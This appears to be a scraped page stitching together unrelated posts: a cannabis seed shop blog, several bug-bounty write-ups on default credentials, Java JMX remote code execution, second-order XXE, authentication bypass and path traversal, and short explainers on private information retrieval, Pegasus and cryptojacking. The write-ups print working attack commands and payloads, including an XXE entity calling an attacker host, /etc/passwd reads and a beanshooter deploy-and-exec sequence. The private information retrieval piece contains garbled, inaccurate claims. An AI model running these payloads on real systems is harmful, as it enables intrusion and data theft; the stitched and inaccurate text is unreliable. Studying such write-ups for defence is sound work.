Cannabis Seed Genetics Explained: Grow Your Dream Strain with The Vault

So, you’ve got your grow lights set up, your soil primed, and your excitement through the roof—but how much do you really know about the genetics of the cannabis seeds you’re planting? If you’re serious about growing top-shelf cannabis, understanding cannabis genetics is the secret sauce. And trust me, once you get the hang of it, choosing seeds from The Vault Cannabis Seed Store will feel like picking out a legendary Pokemon!

In this blog, we’ll demystify cannabis seed genetics and explain why this matters for every grower, whether you’re just starting or already have a few bountiful harvests under your belt. Let’s unlock the door to a world of knowledge that can help you grow the strain of your dreams.

The Basics: What Are Cannabis Seed Genetics?

When we talk about cannabis seed genetics, we’re essentially talking about a plant’s DNA. Just like in humans and animals, the genetic makeup of a cannabis plant dictates its appearance, growth habits, and effects. Whether it will grow tall and lanky or short and bushy, produce dense buds or airy flowers, be rich in THC or packed with CBD—all of these traits are written in its genetic code.

In cannabis, genetics determine:

Strain type (Sativa, Indica, Hybrid)
Cannabinoid profile (THC, CBD, CBG, etc.)
Terpene profile (those tasty aromatic compounds!)
Growth traits (height, yield, flowering time)
Resistance to pests, diseases, and environmental conditions
To make it easy, think of cannabis seed genetics like the ultimate blueprint for your plant. Choose wisely, and you could end up with a strain that checks off every box on your wish list.

Indica vs. Sativa vs. Hybrid: The Classic Debate

Before we dive into more complex genetic details, let’s cover the basics of Indica, Sativa, and Hybrid strains. If you’re new to growing, you’ll likely see these terms everywhere, and they’re foundational to understanding cannabis seed genetics.

Indica

Indica strains are often short, bushy, and suited to colder climates. They’re known for producing a “body high”—that warm, relaxing sensation that leaves you glued to the couch and binge-watching your favorite shows. They typically have shorter flowering times, which makes them appealing for growers looking to harvest sooner rather than later.

Common traits of Indica plants include:

Shorter height (great for indoor grows)
Broad leaves
Relaxing, sedative effects
Shorter flowering time (usually 6-9 weeks)
Popular Indica strains you can snag from The Vault Cannabis Seed Store include Northern Lights and Granddaddy Purple.

Sativa

On the flip side, Sativa strains are tall, lanky, and thrive in warmer climates. These plants are known for their “head high”—a cerebral, uplifting effect that pairs well with creativity and focus. If you’re a day-time user or want a strain that helps you feel energized and inspired, Sativa is your go-to.

Common traits of Sativa plants include:

Taller height (sometimes up to 12 feet!)
Narrow leaves
Uplifting, energetic effects
Longer flowering time (usually 10-14 weeks)
Some popular Sativa seeds at The Vault include Amnesia Haze and Durban Poison.

Hybrid

Then there are Hybrid strains, which are a blend of both Indica and Sativa genetics. These strains give growers and consumers the best of both worlds, often combining the relaxation of Indica with the mental stimulation of Sativa. Hybrids can lean more towards one side or be a true 50/50 split, offering a wide range of effects.

For a hybrid experience, check out strains like Blue Dream or Girl Scout Cookies, both available at The Vault Cannabis Seed Store.

The Importance of Parent Genetics: It’s All in the Family

If you’ve ever heard of a strain being referred to as the “child” of two other strains, you’re not imagining things. Cannabis plants, like animals, have parents. Breeders combine strains (called “crossing”) to develop specific traits, and the offspring (your seeds) inherit traits from both the mother and father plants. It’s like playing with the ultimate genetic toolkit!

For example, if a breeder wants a strain that grows fast (Indica trait) but also produces high yields (Sativa trait), they might cross an Indica-dominant strain with a high-yielding Sativa. The resulting strain might be exactly what they were aiming for—or it might not. Breeding is both an art and a science, and that’s why the genetics behind your seeds are so important.

At The Vault Cannabis Seed Store, you’ll notice strains like White Widow or OG Kush that have been used to breed many of the most popular hybrids on the market today. Knowing the lineage of your strain gives you insights into what you can expect during your grow.

Landrace Strains: The Originals

Let’s talk about landrace strains, which are like the ancient ancestors of today’s cannabis. These strains developed naturally in specific geographic regions, without human interference, and are often the purest forms of Indica or Sativa genetics you can find. Think of them as the OGs of the cannabis world.

Some famous landrace strains include Afghani, Thai, and Durban Poison. While modern hybrid strains might offer more specialized effects or better yields, landrace strains offer a piece of cannabis history and some of the purest genetics available. If you’re a purist or a cannabis historian, growing landrace strains can be an exciting way to experience cannabis in its original form.

Feminized vs. Regular Seeds: The Genetic Dilemma

When shopping for seeds, you’ll come across terms like feminized and regular. This is another crucial aspect of cannabis seed genetics that every grower should understand.

Feminized Seeds

Most growers opt for feminized seeds because they eliminate the guesswork. Feminized seeds are genetically engineered to produce only female plants—important because only female plants produce the resinous buds we all love.

Pros: No need to worry about male plants, which means no accidental pollination or wasted space.
Cons: Some growers argue that feminized seeds might not be as genetically stable as regular seeds, but with high-quality breeders, this isn’t usually an issue.
At The Vault, you can find an extensive selection of feminized seeds, such as Purple Punch and Wedding Cake.

Regular Seeds

Regular seeds give you both male and female plants, meaning you’ll need to sex them and remove the males if you’re only after those glorious buds. However, regular seeds are favored by breeders who want to create new strains by crossing male and female plants.

Pros: Potential to breed your own strains.

Cons: You’ll need to watch out for males unless you’re specifically breeding.

The Vault also stocks an impressive range of regular seeds, like Skunk #1 for those adventurous growers looking to tinker with genetics.

Autoflowering Genetics: The Quick Grower’s Dream

Another genetic factor that’s shaking up the cannabis world is autoflowering seeds. Unlike traditional photoperiod strains, which depend on light cycles to flower, autoflowering strains will automatically switch from vegetative growth to flowering after a certain amount of time, regardless of light exposure.

Autoflowering seeds are often created by breeding cannabis strains with Cannabis ruderalis, a wild, hardy cannabis species known for its ability to flower quickly. These plants tend to be smaller and have shorter grow cycles, making them perfect for beginners or those with limited space and time.

For a speedy grow, check out autoflowering strains like Auto Gorilla Glue or Auto White Widow at The Vault Cannabis Seed Store.

Why Buy from The Vault Cannabis Seed Store?

Alright, now that you’re a cannabis genetics whiz, let’s talk about why The Vault Cannabis Seed Store is the best place to shop for cannabis seeds. Whether you’re looking for landrace strains, hybrid powerhouses, or autoflowering seeds, The Vault offers:

A vast selection of premium genetics from trusted breeders.
Feminized, regular, and autoflowering options to suit every grower’s needs.
Discreet worldwide shipping to ensure your seeds arrive safely.
Exclusive promotions and freebies to make your purchase even sweeter.

Conclusion

Cannabis seed genetics are the backbone of every successful grow. Whether you’re after a relaxing Indica, an energetic Sativa, or a balanced Hybrid, understanding the genetics of your seeds is crucial to growing the perfect plant. And with the wide range of high-quality seeds available at The Vault Cannabis Seed Store, you’re just a click away from growing your dream strain. So what are you waiting for? Get growing today!

Newsletter Sign Up

Make sure you never miss another Vault promo – sign up for our newsletter

Remember: It is illegal to germinate cannabis seeds in many countries including the UK.  It is our duty to inform you of this fact and to urge you to obey all of your local laws to the letter.  The Vault only ever sells or sends out seeds for souvenir, collection or novelty purposes.

Popeax is a member of the Synack Red Team.

Often people think security research requires deep knowledge of systems and exploits, and sometimes it does, but in this case all it took was some curiosity and a Google search to find an alarmingly simple exploit using default credentials.

On a recent host engagement, I discovered an unusual login page running on port 8080, a standard but less often used HTTP port. The login page did not resemble anything I had encountered in the thousands of login pages across hundreds of client engagements.

Nothing new. Even for a seasoned member of the Synack Red Team (SRT), it isn’t unusual to discover commercial products that one hasn’t seen before.

The login page clearly showed the product as some type of IBM server. In the URL, I noticed the string “profoundui.” A quick Internet search identified an IBM resource that stated:

“Profound UI is a graphical, browser-based framework that makes it easy to transform existing RPG applications into Web applications, or develop new rich Web and mobile applications that run on the IBM i (previously known as the AS/400, iSeries, System i) platform using RPG, PHP, or Node.js.”

Given these facts, I Googled for “IBM AS/400 default password” and found IBM documentation that listed default AS/400 credentials.

As any elite hacker would do, I copied and pasted all six default usernames and passwords into the login form.

Sure enough the last set of credentials worked with user QSRVBAS and password QSRVBAS.

It was beyond the scope of the engagement to proceed any further to see how much access was possible. The vulnerability was documented in the report that was given to the client to be remediated.

After a few days, the client requested a patch verification of the vulnerability using Synack’s patch verification workflow. This workflow allows a client to request the SRT to verify an implemented patch within the Synack Platform. After receiving the patch verification request, I quickly verified the vulnerability was no longer exploitable.

It is hard to believe, but even today commercial products still ship and are installed with default credentials. Often the onus is on the end user to be aware they must change the credentials and lock the default accounts.

The ingenuity and curiosity of the SRT cannot be replicated by scanners or automated technology. The SRT members are adept at finding this type of vulnerability in custom and commercial applications, even while running in obscure locations, which leads to exploitable vulnerabilities being surfaced to the customer.

The post Exploits Explained: Default Credentials Still a Problem Today appeared first on Synack.

Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favorite ones are always host assessments. There, one can find a multitude of services with different configurations, versions and usage. One that always caused me trouble was the Java RMI case, until I decided to spend time reviewing the process step by step.

Throughout the years there were several targets where skilled Synack Red Team (SRT) members were able to successfully exploit vulnerabilities with Remote Code Execution, and this information in many cases was missing from my arsenal. I set a goal to find out how the exploitation was taking place and to be able to better understand the tools and methods to finding and exploiting it.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components like network switches or routers. Like SNMP, JMX is also used for monitoring Java-based applications. The most common use case for JMX is monitoring the availability and performance of a Java application server from a central monitoring solution like Nagios, Icinga or Zabbix.

JMX also shares another similarity with SNMP: While most companies only use the monitoring capabilities, JMX is actually much more powerful. JMX allows the user not only to read values from the remote system, it can also be used to invoke methods on the system.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard differs between various MBean types; however, we will only deal with the standard MBeans here. To be a valid MBean, a Java class must:

• Implement an interface
• Provide a default constructor (without any arguments)
• Follow certain naming conventions, for example implement getter/setter methods to read/write attributes

MBean server

An MBean server is a service that manages the MBeans of a system, which we’ll see demonstrated in an attack later in this post. Developers can register their MBeans in the server following a specific naming pattern. The MBean server will forward incoming messages to the registered MBeans. The service is also responsible for forwarding messages from MBeans to external components.

After we have a JMX service running on RMI, we can go through the various ways such a service might be attacked. Over time, various attack techniques have been discovered that are related to JMX over RMI, and we will step through most of them one by one.

Abusing available MBeans

Applications are able to register additional MBeans, which can then be invoked remotely. JMX is commonly used for managing applications, therefore the MBeans are often very powerful.

A failed start

Starting research on the topic, the first items that one will see are references to rmiscout, an exceptional tool on the time that was created but not maintained anymore for over two years with several issues on deployment. At that time I moved on BaRMie, which surprisingly is even older than rmiscout but easier to work with for basic recon. An alternative tool, under the name mjet, seems to be more updated and somewhat easier to use but still my results were poor. As one can see right away, many times simply taking a tool from the shelves and trying to work with it is not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run and that’s something that I was aware of from the start. But everybody is looking for shortcuts.  Back to reading then, and starting with posts such as this one and this one. I ended up on a relatively recent presentation from Tobias Neitzel, where he also presented his tools, RMG and Beanshooter.

New tools, new methods

With a better understanding and with a pair of excellent tools, the results were the following over the next months. 

On a target with several weeks already being launched, the RMI service was not noticed or exploited at that time. The following steps provided an RCE case.

Identifying:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  enum server_ip 9999

Tonka bean deployment:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 –stager-url http://tupoc:8888 –no-stager

On our Tupoc (external Synack collaborator system) 

Waiting for a callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded with a full RCE reward.

Not all cases will happen to be straightforward and in rare occasions issues might arise, but with better understanding of the process and the tools, we are always able to achieve better results.

References:
https://www.youtube.com/watch?v=t_aw1mDNhzI (Amazing work by Tobias Neitzel)
https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process, a few issues were identified in the tools that were handled swiftly and additionally an issue was created towards Glassfish repo under, https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

FrodoPIR (Private Information Retrieval) is a privacy-focused database querying system that allows users to query a database without revealing which records they are interested in. This is accomplished using techniques from cryptography and information theory.

In traditional database querying systems, the client sends a query to the server that stores the database, specifying which records they are interested in. The server then responds by sending the requested data back to the client. However, this process reveals to the server which records the client is interested in, potentially exposing sensitive information about the client’s interests or activities.

FrodoPIR addresses this issue by allowing the client to send a query to the server without revealing which records they are interested in. To do this, the client constructs a special kind of query called a “private information retrieval” (PIR) query, which consists of multiple fake queries that the client mixes together. The client then sends the PIR query to the server, which responds with the requested data without knowing which records the client was actually interested in.

There are several different versions of FrodoPIR, including FrodoKEM, which is optimized for use with key encapsulation mechanisms, and FrodoSAM, which is optimized for use with secure multi-party computation protocols.

FrodoPIR has a number of potential applications in a variety of settings, including healthcare, finance, and online advertising. It can also be used to protect the privacy of users in collaborative data analysis tasks, such as those involving distributed machine learning.

One of the main advantages of FrodoPIR is that it allows users to query a database without revealing which records they are interested in, protecting their privacy. This is particularly useful in settings where sensitive or personal information is stored, as it can help prevent the accidental or malicious disclosure of this information.

The post FrodoPIR: New Privacy-Focused Database Querying System Explained appeared first on OFFICIAL HACKER.

Computer technology has always been touted as a valuable asset in the modern world, so much so that it is said that the next world war may be based on cyberwar. In support of this prediction, there have been reports that several governments around the world are illegally tracking down prominent politicians and journalists using malware from the Israeli NSO group Pegasus.

What is Pegasus Spyware?

Named after the mythical creature, Pegasus spyware – a program used to remotely monitor a target – was created by NSO Group Technologies, based near Tel Aviv. Historically, Pegasus has played an important role in several international incidents, from the capture of a Mexican drug lord to the leaked texts of Amazon founder Jeff Bezos on WhatsApp.

He was recently criticized again after a report said thousands of famous people around the world may have been victims of this spyware.

How does Pegasus Spyware work?

Over the years, Pegasus has used various methods to successfully infect a device. Previously, he used a technique called spear phishing, which involves sending a malicious link to the target. As soon as the link was clicked, Pegasus gained access to the device, and within a few hours, the phone data was transferred to the attacker.

However, nowadays, smartphone security has become more reliable; spyware is now based on an improved version of the “contactless attack”. In this case, an attacker can infect the target device without waiting for a response from a potential victim.

Thus, Pegasus no longer has to wait for a link to be clicked, spyware can easily infect the phone with something as simple as a WhatsApp call.

Who is spying?

The creator of Pegasus, NSO Group, works closely with the Israeli government; Obviously, the latter makes the most of the Pegasus’ observation capabilities.

However, other potential clients have not been left out as the company shares technology with a select group of governments around the world. These foreign clients include India, Azerbaijan, Bahrain, Hungary, Kazakhstan, Mexico, Morocco, Rwanda, Saudi Arabia and the United Arab Emirates.

Who is the target?

While it is impossible to accurately gauge the extent to which a government chooses to use Pegasus, this spyware tends to target journalists — primarily those who pose a problem to the government.

One such incident, in which Pegasus was allegedly used by the government, occurred when Saudi journalist and dissident Jamal Khashoggi was killed in 2018.

Who is working to stop Pegasus Spyware?

The nonprofit Forbidden Stories, human rights organization Amnesty International and a global network of 80 journalists from 17 media groups have come together to investigate how governments are using Pegasus to illegally spy on interested people.

The investigation is called Project Pegasus. In his latest report, he revealed that he has access to a database of 50,000 phone numbers belonging to people whose phones can be infected with spyware.

What is the position of the Indian government?

As the reports claimed the Indian government is one of the NSO Group’s foreign clients for Pegasus. A list of potential targets, including the phone numbers of over 40 Indian journalists from various media outlets, was leaked. In addition, forensic experts have already confirmed the Pegasus attack on at least 10 of the listed phone numbers.

The above allegations have been refuted by the Indian government and the NSO group. While the Indian government has assured that “a commitment to free speech as a fundamental right is the cornerstone of India’s democratic system,” the Israeli technology company simply denied that the report had anything to do with it.

The post Pegasus Spyware Explained: Biggest Questions Answered appeared first on OFFICIAL HACKER.

Innovation and technology multiply by leaps and bounds, every day we are faced with new features or programs in the digital world. But every coin has two sides, technological advances not only lead to development and improvement but also involve the threat of cybercrime.

We collect a ton of news related to data breaches and malicious hacker attacks. Day by day, the fashion for cryptocurrencies is growing rapidly, everyone wants to invest and make billions of gross profits in the cryptocurrency market, the risk is high, but the profit is much higher than the risk. This is a good way to make money, but it is not controlled.

Cybercriminal attacks, Through spear phishing, social engineering, malware distribution, and website degradation, but in September 2017, cryptojacking took over the Internet and quickly became one of the most prevalent forms of malware.

Here we discuss one of the most common cybercrimes, namely crypto jacking.

What is Crypto Jacking?

Basically, in Crypto jacking, a hacker or cybercriminal gains unauthorized access to a specific device without the user’s consent, unlike other threats, it is designed to remain completely hidden from the victim, it is in some way unique compared to other malware attacks, this is not necessarily after the user data, it targets the processing power.

This is malicious cryptocurrency mining that occurs when cybercriminals break into work and personal computers, laptops, and mobile devices to install the software. This software uses the power and resources of a computer to mine cryptocurrency or steal cryptocurrency wallets belonging to unsuspecting victims. In this attack, malware infiltrates a device to use its resources to mine cryptocurrencies.

The malware is based on XMRig, a legitimate open-source cryptocurrency mining project. However, this legitimate script has been hijacked by malware developers for fraudulent cryptocurrency mining. This is mainly done by hackers who want to make a profit, but do not want to bear the risks and costs.

This is the simple reason why cryptojacking is becoming more and more popular among hackers. Investing in bitcoin or any other cryptocurrency is quite expensive. A person has to bear the costs of expensive mining equipment, large electricity bills, and much more.

The cryptocurrency, which is mostly mined on any personal device, is commonly known as Monero, which is quite difficult to trace, making it attractive to hackers or cybercriminals. The attackers behind the distribution of WinstarNssmMiner mined 133 Monero, which is approximately $ 26,500. The motivation behind the crypto jacking attack is simple: money.

Mining cryptocurrency can be very profitable, but making a profit is difficult without funds to cover significant costs. Crypto jacking is growing, hackers are coming up with new ways to steal computing resources and mine cryptocurrencies. It is estimated that up to 25% of organizations experienced crypto jacking activity in their cloud environments in the same year.

Researchers have also uncovered a new crypto jacking scheme that uses a leaked NSA exploit, EternalBlue, to infect vulnerable Windows servers. Crypto jacking is becoming an increasingly popular way for scammers and criminals to extract money from their goals in the form of cryptocurrency, which makes some investors back off or think twice about investing in the cryptocurrency market.

How Crypto Jacking is done?

Cybercriminals hack devices to install cryptojacking software. The software runs in the background, mining cryptocurrency or stealing from cryptocurrency wallets. Hackers do this mainly in two ways: trick victims into downloading the crypto mining code onto their computers.

This is done through phishing tactics, forcing the victim to click a malicious link in an email that downloads the crypto mining code to the computer, the code using the link puts the mining script on the computer, and then that script runs on the Hackers device in the background while the victim is running, or an alternative approach to cryptojacking is sometimes called the “breakout” of crypto mining.

Similar to malicious ad exploits, the scheme involves embedding a piece of JavaScript code into a web page. By infecting a website or internet ad with JavaScript code or multi-website ad that is automatically launched when loaded in the victim’s browser. If victims visit a website or an advertisement, the script is automatically launched, but in this type of attack, the code is not saved on the victim’s device.

In both methods, the code performs complex mathematical tasks on the victim’s computers and sends the results to a server controlled by the attacker.

Crypto jacking doesn’t even require significant technical skills. Some cryptocurrency mining scripts have infection capabilities that allow them to infect other devices and servers on the network. It also makes them difficult to find and remove; maintaining persistence on the network is in the best financial interests of crypto jacking.

These are some of the signs that you are a victim of crypto jacking. Noticeable decrease in device performance, overheating of batteries on devices, disconnection of devices due to lack of available processing power, decreased performance of your device. or router, electricity costs are unexpectedly high, and the biggest impact is that it increases the costs of a person or business who is a victim of crypto jacking.

The main stages of crypto jacking:

• Hack an asset to embed a script
• Run the cryptocurrency mining script
• Crypto mining begins
• Solution algorithms
• Jackers Receives Cryptocurrency Rewards

However, according to a report by security company Kaspersky, cases of crypto jacking occurred in the first quarter of 2021. The report shows that 432,171 users encountered minors on their devices in the first quarter of 2021. 200 045 in March. The number of unique changes made to miners has also more than quadrupled from 3,815 to 16,934. Unique changes are changes made to the miner’s code to mine a new type of currency or adapt to new systems. In the first quarter of 2021, Kaspersky Lab researchers saw 23894 new changes in miners.

The post What do you mean by Crypto Jacking? appeared first on OFFICIAL HACKER.

The Problem

Types of Hackers

Kuldeep Pandya is a member of the Synack Red Team. You can find him on Twitter or his blog.

This writeup is about my recent discovery of a Second Order XXE that allowed me to read files stored on the web server.

One morning, a fresh target was onboarded and I hopped onto it as soon as I received the email. In the scope, there were two web applications listed along with two postman collections. I prefer postman collections over web apps, so I loaded the collections with their environments into my postman.

After sending the very first request, I noticed that the application was using SOAP API to transfer the data. I tried to perform XXE in the SOAP body but the application threw an error saying “DOCTYPE is not allowed”.

Here, we cannot perform XXE as DOCTYPE is explicitly blocked.

Upon checking all the modules one by one, I came across a module named NormalTextRepository in the postman collection which had the following two requests:

• saveNormalText
• GetNamedNormalText

After sending the first saveNormalText request and intercepting it in Burp Suite, I found out that it contained some HTML-encoded data that looked like this:

Upon decoding, the data looked like this:

<?xml version="1.0"?>
<normal xmlns="urn:hl7-org:v3" xmlns:XX="http://REDACTED.com/REDACTED"><content XX:statu

This quickly caught my attention. This was XML data being passed inside the XML body in a SOAP request (Inception vibes).

I went on to try XXE here as well. For this, I copy pasted a simple Blind XXE payload from PortSwigger:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com/XXETEST"> %xxe; ]>

I used Synack’s provided web server to test for this. Upon checking its logs, I found there indeed was a hit for the /XXETEST endpoint.

This still was a blind XXE and I had to turn it into a full XXE in order to receive a full payout. I tried different file read payloads from PayloadsAllTheThings and HackTricks but they did not seem to work in my case.

For me, the XXE was not reflected anywhere in the response. This is why it was comparatively difficult to exploit.

After poking for a while, I gave up with the idea of full XXE and went ahead to check if an internal port scan was possible or not as I was able to send HTTP requests.

I sent the request to Burp Suite’s intruder and fuzzed for the ports from 1 to 1000. The payload for that looked like the following:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:§1§/XXETEST"> %xxe; ]>

However, the result of the intruder didn’t make any sense to me. All the ports that I fuzzed were throwing random time delays.

I lost all hope and was about to give up on this XXE once again. Then a thought struck, “If this data is being saved in the application, it has to be retrievable in some way as well.” I checked the other GetNamedNormalText request in this module and instantly felt silly. This request retrieved the data that we saved from the first saveNormalText request.

I used the following XXE file read payload and saved the data:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

Then sent the second GetNamedNormalText request to retrieve the saved data. And in the response, I could see the contents of the /etc/passwd file!

This was enough for a proof of concept. However, looking at the JSESSIONCOOKIE, I could tell that the application was built using Java. And, in Java applications, if you just provide a directory instead of a file, it will list down the contents of that directory and return it.

To confirm this theory, I just removed the /passwd portion from the above file read payload. The updated payload looked like this:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc"> ]>

Upon saving the above payload and retrieving it using the second request, we could see the directory listing of the /etc directory!

I sent it to Synack and they happily triaged it within approximately 2 hours.

The post Exploits Explained: Second Order XXE Exploitation appeared first on Synack.

Ozgur Alp is a member of the Synack Red Team and has been awarded SRT of the Year 2021, Most Trusted Hacker 2021, Mentor of the Year 2022 and SRT Grand Champion for 2019, 2020 and 2021.

Authentication bypass vulnerabilities are common flaws that exist in modern web applications—but they’re not always easy to find. 

New authentication methods are working wonders to boost cybersecurity at many organizations. While tools like single sign-on (SSO) are often an improvement over old ways of logging users in, these technologies can still contain critical vulnerabilities. Whether it’s business logic errors or some other software flaw, it takes a keen eye to comb through all the complexity.

In this blog, I’ll cover five real-world authentication bypass techniques that I have found in the Synack Platform throughout my time as a member of the Synack Red Team. 

Example #1 – Refresh Token Endpoint Misconfiguration

In this case, once a user logged into the application with valid credentials, it created a Bearer Authentication token used elsewhere in the application. This auth token expired after some time. Just before expiration, the application sent a request to the back-end server within the endpoint /refresh/tokenlogin containing the valid auth token in the headers and username parameter on the HTTP body section. 

Further testing revealed that deleting Authorization header on the request and changing the username parameter on the HTTP body created a new valid token for the supplied username. Using this exploit, an attacker with an anonymous profile could generate an authentication token for any user by just supplying their username. 

Example #2 – Improper SSO Configuration

Most applications use SSO systems because they are easier to securely manage than juggling many authentication portals. But simply using SSO does not automatically protect the system: Configurations to the SSO must be secured as well. 

Here, one application was using the Microsoft SSO system for authentication. When visiting the internal.redacted.com URL, the web browser made a redirect to the SSO system:

On first sight, it seemed secure, but analyzing the back-end requests showed the application returned an unusually large content-length (over 40,000 bytes!) on the redirection response. 

Why would an application do this? Well, it was misconfigured. The application was leaking its internal responses to every request while sending the user to the redirection to the SSO. So, it was possible to tamper the responses and change the 302 Found header to 200 OK and delete the entire Location header, giving access to the whole application.

Also, it was possible to make this process automatic by adding Match & Replace rules in Burp Suite to delete the header directly and change the values automatically. 

Example #3 – CMS Based Access Problems

Content management systems (CMS) like WordPress, Drupal and Hubspot need to be securely configured as well, lest they introduce vulnerabilities in your organization.

One popular CMS platform, Liferay, was used in an internal application in one case I examined. The application only had a single login page accessible without authentication, and all other pages were restricted on the application UI.

For those not familiar with Liferay, the CMS uses portlets for application workflow, which have a parameter as p_p_id within numeric numbers. For that application, it was possible to access the login portlet by changing the parameter to value 58. On the normal login page, only the login form was accessible. However, by accessing the portlet directly, it was possible to reach the Create Account functionality, which then allowed self-registration to access internal applications without proper authorization.

Please note that while Liferay used this workflow before, its latest version uses portlet names instead of numeric ids. Still, it is possible to access other portlets by changing names as well.

Example #4 – Usage of Example JWT Tokens

JWT tokens, or JSON web tokens, are popular on new web applications. But while they have a secure mechanism by default, back-end server configuration should be secured, too. 

I worked on an assignment where SSO authentication was used for their internal applications. When visited directly, the application redirected the user to the Microsoft SSO web page. So far, so good. 

However, some JS files were accessible without authentication. Testing revealed that the application used JWT tokens that were sent via the Microsoft SSO system after a secure login. On the back-end mechanism, there was a security misconfiguration that didn’t check if the JWT token was generated for that specific application–instead, it accepted any JWT token that had a valid signature. So, using an example JWT token from Microsoft’s website: 

Within generic values:

It was possible to access the internal endpoints, leaking the company data. 

Example #5 – Changing Authentication Type to Null

In this instance, an application was sent all requests on the HTTP post data via base64 encoded XML requests. On the login mechanism, it sent the username as parameter alias and password as scode. The value inside the scode parameter was hashed. A quick analysis showed it used an md5 value of the supplied password value. There was another interesting sign in the request: scode had an attribute as type valued with 2. 

I tried assigning the value to 1, which would accept the cleartext password. It worked! So, brute force within cleartext values was possible. Not a big deal, but it was a sign I was on the right path. What about assigning it to the null values? Or other values such as -1, 0 or 9999999999? Most of them returned an error code except value 0. I tried several things with the attribute 0 but had no luck until I sent the password value as an empty value. 

I realized it was possible to access any account by simply supplying the usernames and empty passwords. It turned out to be quite a big bug. 

Conclusion

Complex authentication mechanisms can fall prey to undiscovered attack vectors, especially on applications prone to business logic flaws. Because automatic scanners mostly fail to key into these kinds of vulnerabilities, human power is still needed to find them. Given the complexity of modern software environments, no single security researcher can pick up on all possible vulnerabilities or attack vectors. On-demand security testing with a vetted community of researchers is the best way to combine everyone’s unique knowledge to find the vulnerabilities that matter. 

You can find Ozgur on  Twitter, LinkedIn and Medium.

The post Exploits Explained: 5 Unusual Authentication Bypass Techniques appeared first on Synack.

By Kuldeep Pandya

Hi, guys!

This blog will be about all the different kinds of Path Traversals and Local File Inclusion vulnerabilities that I have found in Synack Red Team.

After hacking on Synack Red Team for approximately 9 months, I came to realize that Path Traversal and LFI like vulnerabilities are very common. I reported a few authenticated vulnerabilities and a few unauthenticated. However, I will try to cover both kinds of vulnerabilities.

Before moving forward, I’d like to list all my Path Traversal/LFI submissions.

Submissions

Descriptions

Path Traversal Vulnerability Leads To Source Code Disclosure

This was the very first Path Traversal vulnerability that I had found in Synack Red Team. Also, even though I was pretty new to the platform and to the whole bug bounty thing in general, this report was selected during the Initial Launch Period, where the best write-up is chosen, not necessarily the first valid report.

After logging into the application, the application provided a bunch of sections like manage vendors, manage inventory, etc with a bunch of functionalities.

Upon further inspecting these sections, I came across an interesting functionality that involved importing the data. The file was named DataImport.view.

I tried getting RCE by uploading an ASPX web shell and it actually worked! Reported it and that report got accepted too! However, that’s a different story. We want to discuss Path Traversals here and not RCEs.

So, after successfully uploading a file, we were given the functionality to read the file.

After clicking the “ReadFile” button, it filled the file name field to the current uploaded filename by default. However, we had the ability to change the file name.

Now, I just had to provide a valid file name. For this, I used the Auth.aspx to which the login request was sent. I could be sure that this exists because a login request was sent to this file and it resided in the webroot.

So, I tried to do path traversal using payloads like ../Auth.aspx and ../../Auth.aspx etc.

And, after three ../ sequences, the file was actually returned!

The response looked like this:

The file was broken because some sort of XML parsing was done on it. I still went ahead and reported it because it was still a path traversal issue and disclosed source code contents.

I could do more creative things here like pulling more sensitive files but I stopped here because very limited time was left in the Initial Launch Period. I initially did not care much for this vulnerability as I had already reported an RCE there but then quickly made a report in under 15 minutes putting together all my PoCs and I still had my report selected as the best write-up during the Initial Launch Period.

Local File Inclusion in VMWare VCenter Running at [REDACTED]

This was the classic VMWare VCenter /eam/vib LFI vulnerability.

The /eam/vib endpoint in VMWare VCenter instances takes a parameter named id in the GET request. The value to this id parameter is a file name that will be retrieved by the VCenter instance and will be given back in the response.

There are already many resources regarding this particular vulnerability and I do not think much is to be said about it in this particular article.

I used the following payload to retrieve the hosts file off the remote server:

There were some IP to host mappings in the hosts file which I thought was enough for impact but with creativity, more could have been achieved.

I reported the issue during the Initial Launch Period, and this was selected.

Spring Boot Path Traversal — CVE-2020-5410

This was a known vulnerability in Spring Boot Cloud Config server. For PoC, I referred to this article here:  http://www.jrasp.com/case/CVE-2020-5410.html

That article talks in detail about the vulnerability and also explains the source code.

I did not read that much and simply took the PoC from there and used it on the target that I had for testing. And the exploit worked!

I used the same payload as in the PoC which is:

The above payload retrieves the /etc/passwd file.

However, this was Java and one odd thing about Java Path Traversals/LFIs is that if you specify a directory instead of a file for opening, it will actually list the content of that directory.

So, for example, if I did not know what files were in the /etc directory, I would simply use the following payload to list all the files:

This is just the previous payload with the trailing /passwd removed. Now, we are just listing the contents of the /etc directory.

